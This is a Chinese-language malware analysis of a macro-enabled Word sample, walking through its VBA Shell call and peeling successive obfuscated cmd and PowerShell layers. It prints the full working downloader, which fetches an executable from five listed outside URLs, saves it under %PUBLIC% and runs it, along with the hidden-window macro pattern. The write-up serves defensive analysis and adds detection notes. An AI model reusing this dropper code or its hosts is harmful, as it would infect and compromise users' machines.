样本地址:

https://www.virustotal.com/#/file/6f9034646e6fcead5342f708031412e3c2efdb4fb0f37bba43133a471d1cb0e0/detection

样本为一个嵌入了宏（Macros）的 Word 文件，寻找命令执行点比较简单，稍微跟了一下就直接定位到了 Shell 调用所在的过程：

Sub SssbuNrRrEn(UJXYrqZETb As String)
' Command-execution point of the macro: the only statement in this Sub that has an
' effect is the Shell call below. UJXYrqZETb is the (3263-character) command line
' passed in by the caller.
On Error Resume Next
' Opaque arithmetic on names that are never assigned in this Sub; with
' On Error Resume Next any failure here is swallowed. Presumably padding/obfuscation.
MfiCpKuAf = RfiiUVAYh - kDjdViQqEL / (6835936 + zKwnqPGLEi - 6704003 + IpdbUjtvvCVI)
zEjLuEwUi = iXmhfkRVQGVwV - AoVXSoivpnn / (7268093 + vRAhOCQHGpnB - 1804077 + ZlPnAjBKFiZ)
' Runs the command line with window style 0 (vbHide), i.e. no visible window.
' Detection angle: the observable is WINWORD.EXE spawning cmd.exe, which then spawns powershell.
Shell UJXYrqZETb, 0
CqNniwttB = DPYGvFXuwi - IKEJaznChl / (2341580 + IMMCUXrtI - 1601950 + WVqhEidP)
HADtjJdIw = qTkrzQuj - DXHoNAC / (6577259 + jSiYDVFRESftq - 2966087 + mRoXiXZmUbasz)
End Sub

明显可以看到 UJXYrqZETb 是关键参数：len(UJXYrqZETb) = 3263，无法直接通过 Debug > Add Watch 完整查看，因此可以把 UJXYrqZETb 写入文件来获取它的完整值，同时把 Shell 调用注释掉，避免调试时真的执行 payload：

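Sub SssbuNrRrEn(UJXYrqZETb As String)
' Analysis patch of the sample's macro: instead of running the 3263-character
' command line, dump it to a scratch file so its full value can be read
' (Debug > Add Watch cannot show it in full). The Shell call is kept commented
' out so running the patched macro never launches the payload.
On Error Resume Next
' Opaque arithmetic from the sample (operands are never assigned in this Sub);
' kept so the patched Sub stays close to the original. Errors are swallowed by
' the On Error Resume Next above.
MfiCpKuAf = RfiiUVAYh - kDjdViQqEL / (6835936 + zKwnqPGLEi - 6704003 + IpdbUjtvvCVI)
zEjLuEwUi = iXmhfkRVQGVwV - AoVXSoivpnn / (7268093 + vRAhOCQHGpnB - 1804077 + ZlPnAjBKFiZ)
' Write the command line itself (not a placeholder string) so output.txt holds
' the complete payload. Each statement on its own line; the pasted listing had
' three of them joined on one line, which VBA would not accept.
Dim objFSO As Object, objFile As Object, outFile As String
Set objFSO = CreateObject("Scripting.FileSystemObject")
outFile = "c:\windows\temp\output.txt"
Set objFile = objFSO.CreateTextFile(outFile, True)
objFile.Write UJXYrqZETb
objFile.Close
' Shell UJXYrqZETb, 0   <- original execution point, intentionally disabled
CqNniwttB = DPYGvFXuwi - IKEJaznChl / (2341580 + IMMCUXrtI - 1601950 + WVqhEidP)
HADtjJdIw = qTkrzQuj - DXHoNAC / (6577259 + jSiYDVFRESftq - 2966087 + mRoXiXZmUbasz)
End Sub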

查看 output.txt 即可得到完整的 cmd 命令：`%C^om^S^p^Ec%` 用 `^` 转义拼出 %ComSpec%（即 cmd.exe），`/V` 开启延迟变量展开，两个 set 出来的变量再以 `!var!` 的形式拼接成 powershell，其后跟着的就是真正要执行的 PowerShell 脚本：

cmd     hhwjquui   qwgeui   qwgeiqweqwe iqw  ohd   ioqwhd   ioqwhido  &       %C^om^S^p^Ec%          /V         /c           set %VBiwAbXNZVRf%=p^o^w^er&&set %WVXlCPwVdc%=^sh^ell&&!%VBiwAbXNZVRf%!!%WVXlCPwVdc%! " & ( $VErBOSePReFErenCe.TOSTrIng()[1,3]+'X'-joIn'')( ((' '+'.( ([stRIN'+'g]j'+'3xVeRBoSepreFerence)[1,3]+cv5Xcv5-Joincv5cv5) ( ('+'cv'+'5.((gET-vcv5+cv5aRIAbLE S0P*MDr*S0P).NamE[3,11,2]-joiNS'+'0PS0P) ( (S'+'0P((iMP4YoiMP+iMPnsi'+'MP+iMP'+'aiMP+iMPdasd = &(Y4EnY4Ecv5+cv5+Y4EeY4E+Y4Ew-oiMP+iMPbjeiMP+iMS0P+S0PPcv5+cv5S0'+'P+S0PcY4Ei'+'MP+iMP+Y4EtYiMP+iMP4Ei'+'MP+iMPS0P+S0P) random;4YoiMP+cv'+'5+cv5iMPYYiMP+iMPUiMP+iMP =iMP+iMP .(Y4EniMP+iMPeY4E+iMP+iMPY4EwY4iMP+iMPE+Y4E-iMP+'+'iMPoS0P+S0PbjectYiMP+iMP4E)iMP+i'+'cv5+cv5MP SysiMP+'+'i'+'MPtemiMP+iMP.Net.iMP'+'+iMPWebCiMP+iMPlient;4YoNiMP+iMPSBiMcv5+cv5P+iMP =iMP+iMP 4iMP+iMPYonsadaiMP+iMPsd.nS0P+S0PextiMP+iMP(10000, 2iMP+iMP82133)i'+'MP+iS0P+S'+'0PMP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX = iS0P+S0PMP+iMPY4EiMP+iMS0P+S0PP iMP+iMPhtiMP+iMPtp:/iMP+cv5+cv5'+'iMS0P+S0PP/iMP+iMPwww.elosduvale.iMP+iMPcomi'+'M'+'P+iMP.biMP+iMPr/OUFWS0P+S0P/?iS0P+S0PMP'+'cv5+cv5+iMPS0P+S0Phttp:iMP+iMP/iMP+cv5+cv5iMP/iMP+cv5+cv5iMPdiMP+iMPuicv5+cv5M'+'P+iMPlcv5+cv5faciMP'+'+iMPolltiMP+iMPdaiMP+iMP.iMP+iMP'+'ciMP+iMPom/rLiMP+iMP7zkpa/iMP+iS0P+S'+'0PMP?http://jiMP'+'+iMPati'+'.iMP+iMPciMP+iMP'+'oiMP+iMPmiMP+iMPS0P+S0'+'P.au/S0P+S0PkiMP+icv5+cv5MPRiMP+iMPBGS7S0P+S0cv5+cv5P/?iMP+'+'iMS0P+S0PPhttiMP+iMPps://ww'+'w.blueyachtchiMcv5+cv5P'+'+iMPartecv5+cv5r.com/cv5+cv5DiMP+iMPIjVX4UiM'+'P+iMP/?http://reiMP+iMPviewzaap.aiMP+cv5+cv5iMPzurewS0P+Scv5+cv50PiMP+iMPebsitesiMP+iMP.net/oMgoZ/Y4iMP+iMPE.iMP+iMPcv5+cv5Split(i'+'MP+iMPY4E?Y4E);4YiMP+iMPoSDCS0P+S0PiMP+iMP i'+'MP+iMP= 4Yicv5+cv5MP+iMPoiS0P+S0PMP+iMPeniMPS0P+S0P+iMPv:publiiMP+iMPc cv5+cv5+ iMcv5+cv5P+iMPY4iMP+iMPEicv5+cv5MP+iMPjPIY4E +iMP+iMS0P+S0PP 4Y'+'oN'+'iMPcv5+cv5+iMPSiMP+iMPB i'+'MP+iMP+ 
(Y4E.ecv5+cv5iMP+iMPxY4E+Y4EeYiMP+iMcv5+cv5P4E)iM'+'P+iMP;iMPcv5+cv5+iMcv5+cv5PfiMP'+'+iMPoreaiMP+iMPciMPcv5+cv5+iMPhiMP'+'cv5+cv5+iMP(4Y'+'oaiS0P+S0PMP+iMPsfc iniMP'+'+iMP 4YoADiMP+'+'iMPCXiMP+iMP){tiMP+iMPryiMP+iMP{4YoYYU'+'.W2KDovLdWiMP+iMPnlvLdiMP+iMPOadFIvLcv5+cv5dlicv5+cv5MS0P+S0PP+iMPS0P+cv5+cv5'+'S0PeiMP+i'+'MPWiMP+iMP2K('+'4Ycv5+cv5iMP+iMPoiMP+iM'+'PasfciMP+iMP.W'+'2iMP+iMPKiS0P+S0PMP'+'+iMPTiMS0P+S0PP+iMPoStrvLd'+'ivLdNg'+'W2K()iM'+'P+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y'+'4EiMP+iMPIncv5+'+'cv5voiMP+iMPY4S0P+S0PEiMP+iMP+Y4EkY4iMP+'+'iMPEiMP+iMS0P+S0PPcv5+cv5+Y4EiMP+iMPe-IiMc'+'v5+cv5P+iMPteiMP+S0P+S0PiMPmYiMP+iMP4E)(4YoSDC)iMP+iMP;break;iMP+iMP}catch{}}iMP)  -rEpLace ([Char]89+[Char]'+'52+[Char]69),[CS0Pcv5+cv5'+'+S0P'+'har]39 -cRS0P+S0cv5+cv5PEPLACeiMPW2KiMP,[Char]34 -rEpLace  i'+'MPjPIiMP,[Char]92  -ccv5+cv5REPLACe([Char]52+[Ccv5+cv5h'+'ar]89+[Char]111),[Char]3S0P+S0P6-cREPLACe(['+'C'+'har]118'+'+[Char]7'+'6+[ChS0P+'+'S0Par]100),[Char]96)vGA& ( IdQsheLLiD[1]+IdQs'+'hElLiD[13]+iMS0P+S0PPXiMP)S0P).rePLaCE(([ChAR]118+[ChAR]71'+'+[ChAR]65),S0P6wnS'+'0P).rePLaCE'+'(S0PIdQS0P,[sTriNG][cv5+cv5ChAR]36).recv5+cv5PLaCE(S0PiMPS0P,[sTriNG][ChAR]39) )cv5'+').rep'+'lAcE(([Char]83+[Char]48+['+'Ch'+'ar]80),[stRiNG][Char]39).replAcE(cv56wncv5,cv5X2'+'zcv5)) ') -CRePLace  'cv5',[cHAR]39 -ReplACE ([cHAR]88+[cHAR]50+[cHAR]122),[cHAR]124  -CRePLace 'j3x',[cHAR]36) )

然后像洋葱一样一层一层剥开你的心（每一层都是 ieX 执行一段经 -replace 还原后的字符串，手工做完替换就得到下一层）:

ieX( ((' '+'.( ([stRIN'+'g]j'+'3xVeRBoSepreFerence)[1,3]+cv5Xcv5-Joincv5cv5) ( ('+'cv'+'5.((gET-vcv5+cv5aRIAbLE S0P*MDr*S0P).NamE[3,11,2]-joiNS'+'0PS0P) ( (S'+'0P((iMP4YoiMP+iMPnsi'+'MP+iMP'+'aiMP+iMPdasd = &(Y4EnY4Ecv5+cv5+Y4EeY4E+Y4Ew-oiMP+iMPbjeiMP+iMS0P+S0PPcv5+cv5S0'+'P+S0PcY4Ei'+'MP+iMP+Y4EtYiMP+iMP4Ei'+'MP+iMPS0P+S0P) random;4YoiMP+cv'+'5+cv5iMPYYiMP+iMPUiMP+iMP =iMP+iMP .(Y4EniMP+iMPeY4E+iMP+iMPY4EwY4iMP+iMPE+Y4E-iMP+'+'iMPoS0P+S0PbjectYiMP+iMP4E)iMP+i'+'cv5+cv5MP SysiMP+'+'i'+'MPtemiMP+iMP.Net.iMP'+'+iMPWebCiMP+iMPlient;4YoNiMP+iMPSBiMcv5+cv5P+iMP =iMP+iMP 4iMP+iMPYonsadaiMP+iMPsd.nS0P+S0PextiMP+iMP(10000, 2iMP+iMP82133)i'+'MP+iS0P+S'+'0PMP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX = iS0P+S0PMP+iMPY4EiMP+iMS0P+S0PP iMP+iMPhtiMP+iMPtp:/iMP+cv5+cv5'+'iMS0P+S0PP/iMP+iMPwww.elosduvale.iMP+iMPcomi'+'M'+'P+iMP.biMP+iMPr/OUFWS0P+S0P/?iS0P+S0PMP'+'cv5+cv5+iMPS0P+S0Phttp:iMP+iMP/iMP+cv5+cv5iMP/iMP+cv5+cv5iMPdiMP+iMPuicv5+cv5M'+'P+iMPlcv5+cv5faciMP'+'+iMPolltiMP+iMPdaiMP+iMP.iMP+iMP'+'ciMP+iMPom/rLiMP+iMP7zkpa/iMP+iS0P+S'+'0PMP?http://jiMP'+'+iMPati'+'.iMP+iMPciMP+iMP'+'oiMP+iMPmiMP+iMPS0P+S0'+'P.au/S0P+S0PkiMP+icv5+cv5MPRiMP+iMPBGS7S0P+S0cv5+cv5P/?iMP+'+'iMS0P+S0PPhttiMP+iMPps://ww'+'w.blueyachtchiMcv5+cv5P'+'+iMPartecv5+cv5r.com/cv5+cv5DiMP+iMPIjVX4UiM'+'P+iMP/?http://reiMP+iMPviewzaap.aiMP+cv5+cv5iMPzurewS0P+Scv5+cv50PiMP+iMPebsitesiMP+iMP.net/oMgoZ/Y4iMP+iMPE.iMP+iMPcv5+cv5Split(i'+'MP+iMPY4E?Y4E);4YiMP+iMPoSDCS0P+S0PiMP+iMP i'+'MP+iMP= 4Yicv5+cv5MP+iMPoiS0P+S0PMP+iMPeniMPS0P+S0P+iMPv:publiiMP+iMPc cv5+cv5+ iMcv5+cv5P+iMPY4iMP+iMPEicv5+cv5MP+iMPjPIY4E +iMP+iMS0P+S0PP 4Y'+'oN'+'iMPcv5+cv5+iMPSiMP+iMPB i'+'MP+iMP+ (Y4E.ecv5+cv5iMP+iMPxY4E+Y4EeYiMP+iMcv5+cv5P4E)iM'+'P+iMP;iMPcv5+cv5+iMcv5+cv5PfiMP'+'+iMPoreaiMP+iMPciMPcv5+cv5+iMPhiMP'+'cv5+cv5+iMP(4Y'+'oaiS0P+S0PMP+iMPsfc iniMP'+'+iMP 
4YoADiMP+'+'iMPCXiMP+iMP){tiMP+iMPryiMP+iMP{4YoYYU'+'.W2KDovLdWiMP+iMPnlvLdiMP+iMPOadFIvLcv5+cv5dlicv5+cv5MS0P+S0PP+iMPS0P+cv5+cv5'+'S0PeiMP+i'+'MPWiMP+iMP2K('+'4Ycv5+cv5iMP+iMPoiMP+iM'+'PasfciMP+iMP.W'+'2iMP+iMPKiS0P+S0PMP'+'+iMPTiMS0P+S0PP+iMPoStrvLd'+'ivLdNg'+'W2K()iM'+'P+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y'+'4EiMP+iMPIncv5+'+'cv5voiMP+iMPY4S0P+S0PEiMP+iMP+Y4EkY4iMP+'+'iMPEiMP+iMS0P+S0PPcv5+cv5+Y4EiMP+iMPe-IiMc'+'v5+cv5P+iMPteiMP+S0P+S0PiMPmYiMP+iMP4E)(4YoSDC)iMP+iMP;break;iMP+iMP}catch{}}iMP)  -rEpLace ([Char]89+[Char]'+'52+[Char]69),[CS0Pcv5+cv5'+'+S0P'+'har]39 -cRS0P+S0cv5+cv5PEPLACeiMPW2KiMP,[Char]34 -rEpLace  i'+'MPjPIiMP,[Char]92  -ccv5+cv5REPLACe([Char]52+[Ccv5+cv5h'+'ar]89+[Char]111),[Char]3S0P+S0P6-cREPLACe(['+'C'+'har]118'+'+[Char]7'+'6+[ChS0P+'+'S0Par]100),[Char]96)vGA& ( IdQsheLLiD[1]+IdQs'+'hElLiD[13]+iMS0P+S0PPXiMP)S0P).rePLaCE(([ChAR]118+[ChAR]71'+'+[ChAR]65),S0P6wnS'+'0P).rePLaCE'+'(S0PIdQS0P,[sTriNG][cv5+cv5ChAR]36).recv5+cv5PLaCE(S0PiMPS0P,[sTriNG][ChAR]39) )cv5'+').rep'+'lAcE(([Char]83+[Char]48+['+'Ch'+'ar]80),[stRiNG][Char]39).replAcE(cv56wncv5,cv5X2'+'zcv5)) ') -CRePLace  'cv5',[cHAR]39 -ReplACE ([cHAR]88+[cHAR]50+[cHAR]122),[cHAR]124  -CRePLace 'j3x',[cHAR]36) )

ieX(  .( ([stRINg]$VeRBoSepreFerence)[1,3]+'X'-Join'') ( ('.((gET-v'+'aRIAbLE S0P*MDr*S0P).NamE[3,11,2]-joiNS0PS0P) ( (S0P((
iMP4YoiMP+iMPnsiMP+iMPaiMP+iMPdasd = &(Y4EnY4E'+'+Y4EeY4E+Y4Ew-oiMP+iMPbjeiMP+iMS0P+S0PP'+'S0P+S0PcY4EiMP+iMP+Y4EtYiMP+
iMP4EiMP+iMPS0P+S0P) random;4YoiMP+'+'iMPYYiMP+iMPUiMP+iMP =iMP+iMP .(Y4EniMP+iMPeY4E+iMP+iMPY4EwY4iMP+iMPE+Y4E-iMP+iMP
oS0P+S0PbjectYiMP+iMP4E)iMP+i'+'MP SysiMP+iMPtemiMP+iMP.Net.iMP+iMPWebCiMP+iMPlient;4YoNiMP+iMPSBiM'+'P+iMP =iMP+iMP 4i
MP+iMPYonsadaiMP+iMPsd.nS0P+S0PextiMP+iMP(10000, 2iMP+iMP82133)iMP+iS0P+S0PMP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX = iS0P+S0PMP
+iMPY4EiMP+iMS0P+S0PP iMP+iMPhtiMP+iMPtp:/iMP+'+'iMS0P+S0PP/iMP+iMPwww.elosduvale.iMP+iMPcomiMP+iMP.biMP+iMPr/OUFWS0P+S
0P/?iS0P+S0PMP'+'+iMPS0P+S0Phttp:iMP+iMP/iMP+'+'iMP/iMP+'+'iMPdiMP+iMPui'+'MP+iMPl'+'faciMP+iMPolltiMP+iMPdaiMP+iMP.iMP
+iMPciMP+iMPom/rLiMP+iMP7zkpa/iMP+iS0P+S0PMP?http://jiMP+iMPati.iMP+iMPciMP+iMPoiMP+iMPmiMP+iMPS0P+S0P.au/S0P+S0PkiMP+i
'+'MPRiMP+iMPBGS7S0P+S0'+'P/?iMP+iMS0P+S0PPhttiMP+iMPps://www.blueyachtchiM'+'P+iMParte'+'r.com/'+'DiMP+iMPIjVX4UiMP+iM
P/?http://reiMP+iMPviewzaap.aiMP+'+'iMPzurewS0P+S'+'0PiMP+iMPebsitesiMP+iMP.net/oMgoZ/Y4iMP+iMPE.iMP+iMP'+'Split(iMP+iM
PY4E?Y4E);4YiMP+iMPoSDCS0P+S0PiMP+iMP iMP+iMP= 4Yi'+'MP+iMPoiS0P+S0PMP+iMPeniMPS0P+S0P+iMPv:publiiMP+iMPc '+'+ iM'+'P+i
MPY4iMP+iMPEi'+'MP+iMPjPIY4E +iMP+iMS0P+S0PP 4YoNiMP'+'+iMPSiMP+iMPB iMP+iMP+ (Y4E.e'+'iMP+iMPxY4E+Y4EeYiMP+iM'+'P4E)iM
P+iMP;iMP'+'+iM'+'PfiMP+iMPoreaiMP+iMPciMP'+'+iMPhiMP'+'+iMP(4YoaiS0P+S0PMP+iMPsfc iniMP+iMP 4YoADiMP+iMPCXiMP+iMP){tiM
P+iMPryiMP+iMP{4YoYYU.W2KDovLdWiMP+iMPnlvLdiMP+iMPOadFIvL'+'dli'+'MS0P+S0PP+iMPS0P+'+'S0PeiMP+iMPWiMP+iMP2K(4Y'+'iMP+iM
PoiMP+iMPasfciMP+iMP.W2iMP+iMPKiS0P+S0PMP+iMPTiMS0P+S0PP+iMPoStrvLdivLdNgW2K()iMP+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y4EiMP+i
MPIn'+'voiMP+iMPY4S0P+S0PEiMP+iMP+Y4EkY4iMP+iMPEiMP+iMS0P+S0PP'+'+Y4EiMP+iMPe-IiM'+'P+iMPteiMP+S0P+S0PiMPmYiMP+iMP4E)(4
YoSDC)iMP+iMP;break;iMP+iMP}catch{}}iMP) -rEpLace ([Char]89+[Char]52+[Char]69),[CS0P'+'+S0Phar]39 -cRS0P+S0'+'PEPLACei
MPW2KiMP,[Char]34 -rEpLace iMPjPIiMP,[Char]92 -c'+'REPLACe([Char]52+[C'+'har]89+[Char]111),[Char]3S0P+S0P6-cREPLACe([
Char]118+[Char]76+[ChS0P+S0Par]100),[Char]96)vGA& ( IdQsheLLiD[1]+IdQshElLiD[13]+iMS0P+S0PPXiMP)S0P).rePLaCE(([ChAR]118
+[ChAR]71+[ChAR]65),S0P6wnS0P).rePLaCE(S0PIdQS0P,[sTriNG]['+'ChAR]36).re'+'PLaCE(S0PiMPS0P,[sTriNG][ChAR]39) )').replAc
E(([Char]83+[Char]48+[Char]80),[stRiNG][Char]39).replAcE('6wn','|')) )

ieX( .ieX ( ('.((gET-v'+'aRIAbLE S0P*MDr*S0P).NamE[3,11,2]-joiNS0PS0P) ( (S0P((iMP4YoiMP+iMPnsiMP+iMPaiMP+iMPdasd = &(Y4EnY4E'+'+Y4EeY4E+Y4Ew-oiMP+iMPbjeiMP+iMS0P+S0PP'+'S0P+S0PcY4EiMP+iMP+Y4EtYiMP+iMP4EiMP+iMPS0P+S0P) random;4YoiMP+'+'iMPYYiMP+iMPUiMP+iMP =iMP+iMP .(Y4EniMP+iMPeY4E+iMP+iMPY4EwY4iMP+iMPE+Y4E-iMP+iMPoS0P+S0PbjectYiMP+iMP4E)iMP+i'+'MP SysiMP+iMPtemiMP+iMP.Net.iMP+iMPWebCiMP+iMPlient;4YoNiMP+iMPSBiM'+'P+iMP =iMP+iMP 4iMP+iMPYonsadaiMP+iMPsd.nS0P+S0PextiMP+iMP(10000, 2iMP+iMP82133)iMP+iS0P+S0PMP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX = iS0P+S0PMP+iMPY4EiMP+iMS0P+S0PP iMP+iMPhtiMP+iMPtp:/iMP+'+'iMS0P+S0PP/iMP+iMPwww.elosduvale.iMP+iMPcomiMP+iMP.biMP+iMPr/OUFWS0P+S0P/?iS0P+S0PMP'+'+iMPS0P+S0Phttp:iMP+iMP/iMP+'+'iMP/iMP+'+'iMPdiMP+iMPui'+'MP+iMPl'+'faciMP+iMPolltiMP+iMPdaiMP+iMP.iMP+iMPciMP+iMPom/rLiMP+iMP7zkpa/iMP+iS0P+S0PMP?http://jiMP+iMPati.iMP+iMPciMP+iMPoiMP+iMPmiMP+iMPS0P+S0P.au/S0P+S0PkiMP+i'+'MPRiMP+iMPBGS7S0P+S0'+'P/?iMP+iMS0P+S0PPhttiMP+iMPps://www.blueyachtchiM'+'P+iMParte'+'r.com/'+'DiMP+iMPIjVX4UiMP+iMP/?http://reiMP+iMPviewzaap.aiMP+'+'iMPzurewS0P+S'+'0PiMP+iMPebsitesiMP+iMP.net/oMgoZ/Y4iMP+iMPE.iMP+iMP'+'Split(iMP+iMPY4E?Y4E);4YiMP+iMPoSDCS0P+S0PiMP+iMP iMP+iMP= 4Yi'+'MP+iMPoiS0P+S0PMP+iMPeniMPS0P+S0P+iMPv:publiiMP+iMPc '+'+ iM'+'P+iMPY4iMP+iMPEi'+'MP+iMPjPIY4E +iMP+iMS0P+S0PP 4YoNiMP'+'+iMPSiMP+iMPB iMP+iMP+ (Y4E.e'+'iMP+iMPxY4E+Y4EeYiMP+iM'+'P4E)iMP+iMP;iMP'+'+iM'+'PfiMP+iMPoreaiMP+iMPciMP'+'+iMPhiMP'+'+iMP(4YoaiS0P+S0PMP+iMPsfc iniMP+iMP 4YoADiMP+iMPCXiMP+iMP){tiMP+iMPryiMP+iMP{4YoYYU.W2KDovLdWiMP+iMPnlvLdiMP+iMPOadFIvL'+'dli'+'MS0P+S0PP+iMPS0P+'+'S0PeiMP+iMPWiMP+iMP2K(4Y'+'iMP+iMPoiMP+iMPasfciMP+iMP.W2iMP+iMPKiS0P+S0PMP+iMPTiMS0P+S0PP+iMPoStrvLdivLdNgW2K()iMP+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y4EiMP+iMPIn'+'voiMP+iMPY4S0P+S0PEiMP+iMP+Y4EkY4iMP+iMPEiMP+iMS0P+S0PP'+'+Y4EiMP+iMPe-IiM'+'P+iMPteiMP+S0P+S0PiMPmYiMP+iMP4E)(4YoSDC)iMP+iMP;break;iMP+iMP}catch{}}iMP) -rEpLace ([Char]89+[Char]52+[Char]69),[CS0P'+'+S0Phar]39 -cRS0P+S0'+'PEPLACeiMPW2KiMP,[Char]34 
-rEpLace iMPjPIiMP,[Char]92 -c'+'REPLACe([Char]52+[C'+'har]89+[Char]111),[Char]3S0P+S0P6-cREPLACe([Char]118+[Char]76+[ChS0P+S0Par]100),[Char]96)vGA& ( IdQsheLLiD[1]+IdQshElLiD[13]+iMS0P+S0PPXiMP)S0P).rePLaCE(([ChAR]118+[ChAR]71+[ChAR]65),S0P6wnS0P).rePLaCE(S0PIdQS0P,[sTriNG]['+'ChAR]36).re'+'PLaCE(S0PiMPS0P,[sTriNG][ChAR]39) )').replAcE(([Char]83+[Char]48+[Char]80),[stRiNG][Char]39).replAcE('6wn','|')) )

ieX( .ieX .((gET-vaRIAbLE '*MDr*').NamE[3,11,2]-joiN'') ( ('((iMP4YoiMP+iMPnsiMP+iMPaiMP+iMPdasd = &(Y4EnY4E+Y4EeY4E+Y4Ew-oiMP+iM
PbjeiMP+iM'+'P'+'cY4EiMP+iMP+Y4EtYiMP+iMP4EiMP+iMP'+') random;4YoiMP+iMPYYiMP+iMPUiMP+iMP =iMP+iMP .(Y4EniMP+iMPeY4E+iM
P+iMPY4EwY4iMP+iMPE+Y4E-iMP+iMPo'+'bjectYiMP+iMP4E)iMP+iMP SysiMP+iMPtemiMP+iMP.Net.iMP+iMPWebCiMP+iMPlient;4YoNiMP+iMP
SBiMP+iMP =iMP+iMP 4iMP+iMPYonsadaiMP+iMPsd.n'+'extiMP+iMP(10000, 2iMP+iMP82133)iMP+i'+'MP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX
= i'+'MP+iMPY4EiMP+iM'+'P iMP+iMPhtiMP+iMPtp:/iMP+iM'+'P/iMP+iMPwww.elosduvale.iMP+iMPcomiMP+iMP.biMP+iMPr/OUFW'+'/?i'
+'MP+iMP'+'http:iMP+iMP/iMP+iMP/iMP+iMPdiMP+iMPuiMP+iMPlfaciMP+iMPolltiMP+iMPdaiMP+iMP.iMP+iMPciMP+iMPom/rLiMP+iMP7zkpa
/iMP+i'+'MP?http://jiMP+iMPati.iMP+iMPciMP+iMPoiMP+iMPmiMP+iMP'+'.au/'+'kiMP+iMPRiMP+iMPBGS7'+'/?iMP+iM'+'PhttiMP+iMPps
://www.blueyachtchiMP+iMParter.com/DiMP+iMPIjVX4UiMP+iMP/?http://reiMP+iMPviewzaap.aiMP+iMPzurew'+'iMP+iMPebsitesiMP+iM
P.net/oMgoZ/Y4iMP+iMPE.iMP+iMPSplit(iMP+iMPY4E?Y4E);4YiMP+iMPoSDC'+'iMP+iMP iMP+iMP= 4YiMP+iMPoi'+'MP+iMPeniMP'+'+iMPv:
publiiMP+iMPc + iMP+iMPY4iMP+iMPEiMP+iMPjPIY4E +iMP+iM'+'P 4YoNiMP+iMPSiMP+iMPB iMP+iMP+ (Y4E.eiMP+iMPxY4E+Y4EeYiMP+iMP
4E)iMP+iMP;iMP+iMPfiMP+iMPoreaiMP+iMPciMP+iMPhiMP+iMP(4Yoai'+'MP+iMPsfc iniMP+iMP 4YoADiMP+iMPCXiMP+iMP){tiMP+iMPryiMP+
iMP{4YoYYU.W2KDovLdWiMP+iMPnlvLdiMP+iMPOadFIvLdliM'+'P+iMP'+'eiMP+iMPWiMP+iMP2K(4YiMP+iMPoiMP+iMPasfciMP+iMP.W2iMP+iMPK
i'+'MP+iMPTiM'+'P+iMPoStrvLdivLdNgW2K()iMP+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y4EiMP+iMPInvoiMP+iMPY4'+'EiMP+iMP+Y4EkY4iMP+iM
PEiMP+iM'+'P+Y4EiMP+iMPe-IiMP+iMPteiMP+'+'iMPmYiMP+iMP4E)(4YoSDC)iMP+iMP;break;iMP+iMP}catch{}}iMP) -rEpLace ([Char]89
+[Char]52+[Char]69),[C'+'har]39 -cR'+'EPLACeiMPW2KiMP,[Char]34 -rEpLace iMPjPIiMP,[Char]92 -cREPLACe([Char]52+[Char]8
9+[Char]111),[Char]3'+'6-cREPLACe([Char]118+[Char]76+[Ch'+'ar]100),[Char]96)vGA& ( IdQsheLLiD[1]+IdQshElLiD[13]+iM'+'PX
iMP)').rePLaCE(([ChAR]118+[ChAR]71+[ChAR]65),'|').rePLaCE('IdQ',[sTriNG][ChAR]36).rePLaCE('iMP',[sTriNG][ChAR]39) ) )
ieX(  .ieX .ieX (('4Yo'+'ns'+'a'+'dasd = &(Y4EnY4E+Y4EeY4E+Y4Ew-o'+'bje'+'cY4E'+'+Y4EtY'+'4E'+') random;4Yo'+'YY'+'U'+' ='+' .(Y4En'+'e
Y4E+'+'Y4EwY4'+'E+Y4E-'+'objectY'+'4E)'+' Sys'+'tem'+'.Net.'+'WebC'+'lient;4YoN'+'SB'+' ='+' 4'+'Yonsada'+'sd.next'+'(1
0000, 2'+'82133)'+';4YoA'+'D'+'C'+'X = '+'Y4E'+' '+'ht'+'tp:/'+'/'+'www.elosduvale.'+'com'+'.b'+'r/OUFW/?'+'http:'+'/'+
'/'+'d'+'u'+'lfac'+'ollt'+'da'+'.'+'c'+'om/rL'+'7zkpa/'+'?http://j'+'ati.'+'c'+'o'+'m'+'.au/k'+'R'+'BGS7/?'+'htt'+'ps:/
/www.blueyachtch'+'arter.com/D'+'IjVX4U'+'/?http://re'+'viewzaap.a'+'zurew'+'ebsites'+'.net/oMgoZ/Y4'+'E.'+'Split('+'Y4
E?Y4E);4Y'+'oSDC'+' '+'= 4Y'+'o'+'en'+'v:publi'+'c + '+'Y4'+'E'+'jPIY4E +'+' 4YoN'+'S'+'B '+'+ (Y4E.e'+'xY4E+Y4EeY'+'4E
)'+';'+'f'+'orea'+'c'+'h'+'(4Yoa'+'sfc in'+' 4YoAD'+'CX'+'){t'+'ry'+'{4YoYYU.W2KDovLdW'+'nlvLd'+'OadFIvLdl'+'e'+'W'+'2K
(4Y'+'o'+'asfc'+'.W2'+'K'+'T'+'oStrvLdivLdNgW2K()'+', 4YoSD'+'C);&'+'(Y4E'+'Invo'+'Y4E'+'+Y4EkY4'+'E'+'+Y4E'+'e-I'+'te'
+'mY'+'4E)(4YoSDC)'+';break;'+'}catch{}}') -rEpLace ([Char]89+[Char]52+[Char]69),[Char]39 -cREPLACe'W2K',[Char]34 -rEp
Lace 'jPI',[Char]92 -cREPLACe([Char]52+[Char]89+[Char]111),[Char]36-cREPLACe([Char]118+[Char]76+[Char]100),[Char]96)|
& ( $sheLLiD[1]+$shElLiD[13]+'X') )
# Final decoded stage. The listing is wrapped for display: line breaks fall inside
# tokens and string literals, so it is not runnable as pasted.
# Behaviour visible in the text: New-Object Random and System.Net.WebClient; a random
# integer from .next(10000, 282133) names the drop file $env:public\<random>.exe; the
# five '?'-separated URLs are tried in order, DownloadFile then Invoke-Item on the first
# that succeeds, then break; every failure is swallowed by the empty catch{}.
# $sheLLiD[1]+$shElLiD[13]+'X' is "ieX" ($ShellId is "Microsoft.PowerShell"), and the
# backtick-escaped member names ("Do`Wnl`OadFI`le", "ToStr`i`Ng") are plain
# DownloadFile / ToString.
# Host IoC for hunting: a numerically named .exe written under %PUBLIC% by a
# WINWORD > cmd > powershell process chain.
